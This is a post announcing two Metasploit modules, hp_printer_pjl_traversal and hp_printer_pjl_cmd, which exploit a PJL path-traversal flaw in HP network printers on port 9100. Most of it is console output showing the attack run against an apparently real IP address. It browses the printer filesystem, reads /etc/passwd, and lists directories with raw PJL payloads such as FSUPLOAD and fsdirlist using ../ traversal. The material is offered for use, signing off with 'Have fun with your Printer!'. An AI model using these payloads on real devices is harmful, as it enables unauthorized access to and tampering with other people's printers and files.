[Metasploit] New Modules: hp_printer_pjl_traversal & hp_printer_pjl_cmd
http://www.exploit-db.com/exploits/17635/
http://www.exploit-db.com/exploits/17636/
_____________________________________________________
With the decade-old dot-dot-slash payloads, the entire printer file system can be accessed or modified.
http://www.exploit-db.com/exploits/17636/
_____________________________________________________
hp_printer_pjl_traversal:
This module exploits path traveresal issue in possibly all HP network-enabled printer series, especially those which enable Printer Job Language (aka PJL) command interface through the default JetDirect port 9100.With the decade-old dot-dot-slash payloads, the entire printer file system can be accessed or modified.
msf auxiliary(hp_printer_pjl_traversal) > show options Module options (auxiliary/admin/hp_printer_pjl_traversal): Name Current Setting Required Description ---- --------------- -------- ----------- INTERACTIVE true no Enter interactive mode [msfconsole Only] RHOST 202.138.16.21 yes The target address RPATH /hp yes The remote filesystem path to browse or read RPORT 9100 yes The target port msf auxiliary(hp_printer_pjl_traversal) > set RPATH / RPATH => / msf auxiliary(hp_printer_pjl_traversal) > run [*] Entering interactive mode [*] cd / ... [+] Server returned the following response: . TYPE=DIR .. TYPE=DIR bin TYPE=DIR usr TYPE=DIR etc TYPE=DIR hpmnt TYPE=DIR hp TYPE=DIR lib TYPE=DIR dev TYPE=DIR init TYPE=FILE SIZE=9016 .profile TYPE=FILE SIZE=834 tmp TYPE=DIR [*] Current RPATH: / [*] -> 'quit' to exit [*] ->'/' to return to file system root [*] ->'..' to move up to one directory [*] ->'!r FILE' to read FILE on current directory [*] Enter RPATH: $ > hp [*] cd /hp ... [+] Server returned the following response: . TYPE=DIR .. TYPE=DIR app TYPE=DIR lib TYPE=DIR bin TYPE=DIR webServer TYPE=DIR images TYPE=DIR DemoPage TYPE=DIR loc TYPE=DIR AsianFonts TYPE=DIR data TYPE=DIR etc TYPE=DIR lrt TYPE=DIR [*] Current RPATH: /hp [*] -> 'quit' to exit [*] ->'/' to return to file system root [*] ->'..' to move up to one directory [*] ->'!r FILE' to read FILE on current directory [*] Enter RPATH: $ > webServer/config [*] cd /hp/webServer/config ... [+] Server returned the following response: . TYPE=DIR .. TYPE=DIR soe.xml TYPE=FILE SIZE=23615 version.6 TYPE=FILE SIZE=45 [*] Current RPATH: /hp/webServer/config [*] -> 'quit' to exit [*] ->'/' to return to file system root [*] ->'..' to move up to one directory [*] ->'!r FILE' to read FILE on current directory [*] Enter RPATH: $ > !r version.6 [*] cat /hp/webServer/config/version.6 ... [+] Server returned the following response: WebServer directory version. Do not delete! [*] Current RPATH: /hp/webServer/config [*] -> 'quit' to exit [*] ->'/' to return to file system root [*] ->'..' to move up to one directory [*] ->'!r FILE' to read FILE on current directory [*] Enter RPATH: $ > / [*] cd / ... [+] Server returned the following response: . TYPE=DIR .. TYPE=DIR bin TYPE=DIR usr TYPE=DIR etc TYPE=DIR hpmnt TYPE=DIR hp TYPE=DIR lib TYPE=DIR dev TYPE=DIR init TYPE=FILE SIZE=9016 .profile TYPE=FILE SIZE=834 tmp TYPE=DIR [*] Current RPATH: / [*] -> 'quit' to exit [*] ->'/' to return to file system root [*] ->'..' to move up to one directory [*] ->'!r FILE' to read FILE on current directory [*] Enter RPATH: $ > !r etc/passwd [*] cat /etc/passwd ... [+] Server returned the following response: root::0:0::/:/bin/dlsh [*] Current RPATH: / [*] -> 'quit' to exit [*] ->'/' to return to file system root [*] ->'..' to move up to one directory [*] ->'!r FILE' to read FILE on current directory [*] Enter RPATH: $ > quit [*] Exited ... Have fun with your Printer! [*] Auxiliary module execution completed
hp_printer_pjl_cmd:
This module acts as a HP printer PJL (Printer Job Language) query tool that allows you to submit your own PJL commands. Valid PJL commands are required to get successful response. See the reference section for PJL reference guides from HP.msf auxiliary(hp_printer_pjl_cmd) > run [*] Entering interactive mode ... [*] Please wait while executing - [*] FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=999 [+] Server returned the following response: root::0:0::/:/bin/dlsh [*] Enter PJL Command: [*] -> 'quit' to exit $ > fsdirlist name="0:/../../../" entry=1 count=99999999 [*] Please wait while executing - [*] fsdirlist name="0:/../../../" entry=1 count=99999999 [+] Server returned the following response: . TYPE=DIR .. TYPE=DIR bin TYPE=DIR usr TYPE=DIR etc TYPE=DIR hpmnt TYPE=DIR hp TYPE=DIR lib TYPE=DIR dev TYPE=DIR init TYPE=FILE SIZE=9016 .profile TYPE=FILE SIZE=834 tmp TYPE=DIR [*] Enter PJL Command: [*] -> 'quit' to exit $ > quit [*] Exited ... Have fun with your Printer! [*] Auxiliary module execution completed msf auxiliary(hp_printer_pjl_cmd) >